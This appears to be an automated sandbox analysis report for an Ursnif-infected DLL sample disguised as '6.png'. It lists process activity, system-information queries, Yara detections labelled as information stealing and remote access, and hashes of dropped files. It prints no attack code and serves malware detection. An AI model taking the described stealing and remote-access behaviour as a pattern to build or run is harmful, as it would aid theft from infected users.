Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_00F1A303 cpuid

4_2_00F1A303

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_00F13A79 HeapFree,GetSystemTimeAsFileTime,HeapFree,

4_2_00F13A79

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_00F14638 GetVersion,lstrcat,lstrcat,lstrcat,GetLastError,

4_2_00F14638

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_00F1A303 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

4_2_00F1A303

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

ID:	539457
Product:	CloudBasic
Start time:	10:32:11
Start date:	14.12.2021
Sample:	6.png
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	ac57d694b86d8532b38d3d62f6de3afc
SHA1:	c858ec742ba91bf8c139b7bb654ca2d67747c5ef
SHA256:	fa668d1a58b3b92d9c1b9a740facfaebb35dd723deaf5a3833592208a8a47e5e
Filetype:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	1F1446CE05A385817C3EF20CBD8B6E6A	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	05CF074042A017A42C1877FC5DB819AB	5AF2016605B06ECE0BFB3916A9480D6042355188	971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
C:\Users\user\AppData\Local\Temp\RES11BF.tmp	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols	27C528436B2B3C05916BE7800A1BDCA3	26B8F391092F85DDFD9F5820E91C7EEA36070D53	608F560F77DFA1AC315ABF79CE35E71EBD5E090F1E1335C5E6B4E38995128647
C:\Users\user\AppData\Local\Temp\RES148E.tmp	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols	29E70867DFDE4F487090ABBBCB2B484F	31B7F94349888DF87A60D3A792DF85D31460CA2E	C9C2C56C48B397FB5BB9ACFDF50E2ED7EFE06542BAE0BEC0A5581231FA63B8F1
C:\Users\user\AppData\Local\Temp\RES1B16.tmp	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols	40F552368035B59FB38A94FC74FE0504	6C04143209198C63E8E2315435BC3EB3B99BB259	6EE40A1F274E2A37AE5C850C15BC241463652ED312820B9CCCAEB7BB1C822CF1
C:\Users\user\AppData\Local\Temp\RES451.tmp	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols	2997036F1D6399BDEDC49939CBDB26D4	FBA41FB870A14910B1BC32C973C39C8C80458E93	F4A370736333FC785FE73DBD7468D3FF3B2003BE891BDA032A3C2994614A495F
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ccsd0th.iwn.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1zreigz2.4ov.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34kodmfv.oiy.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cgdeyylx.qwp.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjo40dyp.crc.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_karhuzep.53l.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnjjoctr.bdk.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ybuxanvq.4gq.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.0.cs	UTF-8 Unicode (with BOM) text	B1DA1EF961AA0CE50C236459261D955A	99CF19F188248557193608FE42C1CB88FCF234E1	139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	0D4DF55C848FD70C7E467D2A26D53F45	F4B759DBF60B7BD4760AEEE2865A47EA64FE59BC	65AD1A8591B4C85B19C20F7CB6F215675131DC225B6397BAC64CF9BA285E7F6C
C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.out	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators	FA46AB7E9BCF97E847F3322DB66934B8	49552871F35929703C3CD5F33753436E21017849	C1CEBB10D75BF73B1B70A7855F8EC4923B79BD07EA173CB98395C0969369AE0F
C:\Users\user\AppData\Local\Temp\dtnsoflb\CSC7C356A6CF33949CF872753BDA33569A0.TMP	MSVC .res	5D58A66193F5DD7122F936E757049652	21888C5F01076812CAB34CA539D7AFF39C3B8C91	0735A78CEDD997EA2580034E6867C7010C496B55B3A12DADD449C590F098EDA2
C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.0.cs	UTF-8 Unicode (with BOM) text	B1DA1EF961AA0CE50C236459261D955A	99CF19F188248557193608FE42C1CB88FCF234E1	139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	C5EAA36B02E3E42DCAC19315987BD2BF	9E911AD12F0713B3E5C501D19BB86C77472FD22D	AA30E86130161DA18E4EB94BB2F46B956D4A23C1359588276525791FED359947
C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	49B131E65B23D979BA7ED017BA9C7F61	E4F38CA7AD5EE7CDD3755D0AF594DCE2EBB29035	EDAB1CDD86EBBB84944E94F478BFADF9B7704336C65BE2CF7EF74A2691261512
C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.out	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators	5520D1A07EE800264B0E26905CDD21F1	AB2EBB2894E8B4D6800436C7D1678737430BB273	5658F5CB41F431B1472EEF88932E02DEF879A12362D986DFD847F6E7EEA41DA8
C:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP	MSVC .res	2C961A918364FF38854F8EC54AF4945F	B0B1AF0532EAC84BAF2E604E3FF19E39D365B473	501BAEF967AAD4AB2AA2F5BFC768E871A8E98381C5AA409ADBCA5E31538DF8F1
C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.0.cs	UTF-8 Unicode (with BOM) text	66D77EA7A947B910D56CFB0FC4B85BE6	9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B	66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	30EEDF26D86038CE52442382C4102198	CF34BD8F77949FE161B5776819A519BE39E881D4	4FB991BB47038A3CE9017D5F7A9C5AF7437683FB51BD2FD9CE697EF26221ABB7
C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	833C125BC415845EE1B8A822DC088C02	D6A1176ACF053B03DA6D519EAB4EB7017B48A0E8	996E609A3921946330E840406C64CD8F7AB162B88504BCE05DCA581E264CD7E3
C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.out	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators	F92374784F54FAECD630C33FDA8432E7	D7EE4FE021D3E360ABE78C8F6D8F0669ADBB8226	6D480811F8E381CACFDB17A10A0FDA08081AF31457C33DD74AE5E466667863C9
C:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP	MSVC .res	7BB8DBEA1D7CC9AE6DD3C9DDACDD5B05	70F372DC7BEC4258A118B2994CF727706C637A6F	7E32817C8D9513A2384D66358662E876E51F86C98ED88DCEF8600E517D18EE4B
C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.0.cs	UTF-8 Unicode (with BOM) text	66D77EA7A947B910D56CFB0FC4B85BE6	9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B	66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	B5A546325FF70B405A6EDD0E5B93A5B0	1E9346960956AE815C2BDA5EC359E6D535A870FE	D00CA81D76135390A9D1558CDE7562A4BE918C9DE9777A71881B6454A3ECE403
C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	32F1B9D17FF5CE273F76E691A3957DA8	3233B9F58DAA9DF48B43342EE29CC6AD6B8D4178	81BBAACB864F40359F08B4E22970E88F040D833B132CF5E48765A22CEE909384
C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.out	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators	7E8A8641A737C70C899C4179EDDFC967	3D6B8AB11FC9BF77D4395D19B1F8555B94768BB2	542B3D61A71514E012405F6DA07489BEEAEC5F0454D4CB25967E2BABCC896873
C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.0.cs	UTF-8 Unicode (with BOM) text	B1DA1EF961AA0CE50C236459261D955A	99CF19F188248557193608FE42C1CB88FCF234E1	139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	0E1A4FB543233681B29500DF56AA6F57	8184927FBC93A8FCE2FD8CDCEC13AC2F88FB8306	EADB21BF3DAE2990213DE43C3E98CBAA88F21623B1B6A918BEE662FEEFB42507
C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.out	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators	7241074EE55D01DA6C48E3A1DED01E88	8221789569283A548A8860B38CE838E40150866B	FAF7AEF162FB9D7E43C8A189411C11D62BB1990731351E8520ED648937EE5A97
C:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP	MSVC .res	1DF567DCC97B0A7A089824364B677531	F78BFB839164EEA3C6373359223DF1E347ABAAF3	E9775CAE51FE4CF3AE6BD9573077DBCB268034D0940A69E9E8020305F210E05E
C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.0.cs	UTF-8 Unicode (with BOM) text	66D77EA7A947B910D56CFB0FC4B85BE6	9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B	66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	06D22660044726226847AB9E405CDCA3	0FB2A0C3CFCD8C7F2B1DDBB956ABDABBFA1CB06D	EE83EE6D67E2174D63373BE421E6411D81997D2C20B757074BED1C71EC273790
C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	90EE0F91FF3E5AC8250C42785D163FB7	13276BD1000D8F797C73C9B4BCA08127868C1EC9	E7251525735F9C3302CDE3DBF5F1796096283241712C20F38F5C4F64EA73070D
C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.out	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators	5D4927D1B228C0B04BE990A5CF5142D1	BA0F046F862F9C11763D08A4CF8D3920EA250AD1	4C6B817FC7F440DE8C31AD988B1CCEA218531E2BCC2FDDBBF79F1AC6EA07E95E
C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.0.cs	UTF-8 Unicode (with BOM) text	B1DA1EF961AA0CE50C236459261D955A	99CF19F188248557193608FE42C1CB88FCF234E1	139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	7C6E6D084FD264B37BCD7CC2BFAF1523	197FBFFC51C699B27EB6EB0C914E044103B1503E	1EAA871B794C66E8F63C4EAC98E9110E562B64B2C81CE1F4B380ACF378EA0BB1
C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.out	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators	D25692BE4A7B9E0D1859FED2E0B81B64	5686819FE68A92F329686AEDF4CDD3CC8DA92609	D1260E5FC02624D38E533E5DB33FC83912F8A907509D4C1809BAB069CDDB8912
C:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP	MSVC .res	74AC8729B044EF3E55CA0A024EFF165F	CBFB0EA2703141E51FB43DA9F9288DA871566FB7	C9AF660105465928BE198DBDEB8D4BE5BA9D1B3048299AEB4CA1678D0E829480
C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.0.cs	UTF-8 Unicode (with BOM) text	66D77EA7A947B910D56CFB0FC4B85BE6	9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B	66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	FEC723AE4CE1D4A72A48375DAE57F152	7D0E0234A688710DE2AFE91CBDAA0F7EDC5449C4	AF7C1A6DBC10AA5EBB5D72297108D245410FB5FB55D48E3386E4799963732300
C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	E78B4F20C9C3ECDFAADE20B23787EBCB	B89C1EC666680DA7AB129A0F5E9A593625D94201	0CF920EAE8AD9733EB1FEAE76CAE748499E334BD5AF3B8E6F0D1940810C3D7F2
C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.out	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators	D86ACBAA58E203B2849D410C07220578	22F3A10EF4FB73B6A76D6FA4C6DCC7D8E6842A83	9FEC93CFFFF08573DED5958B966582FAC2EB57E68469BF94850C73385625AB86
C:\Users\user\Documents\20211214\PowerShell_transcript.841675.6dNuCqGT.20211214103418.txt	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators	51B9F4D065CD36EEB47C62B81AFB7F06	BCFD8E1BD2F58F4F3F3150F672857CF45E23BC2A	FAF75023385D35770B9D01F760C1876E1E25445A6D9C839CDAE71091453519F8
C:\Users\user\Documents\20211214\PowerShell_transcript.841675.DMr5Wv1u.20211214103418.txt	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators	7291ABA011A1193C203450F5D3512461	310F781764BB9AC8A8D3B7F14E38AD05EE18730C	0FA2BD16F02EEC7CA811D01D14782EC171D0A7E6AC1C4439C87B2E6A0C6536C4
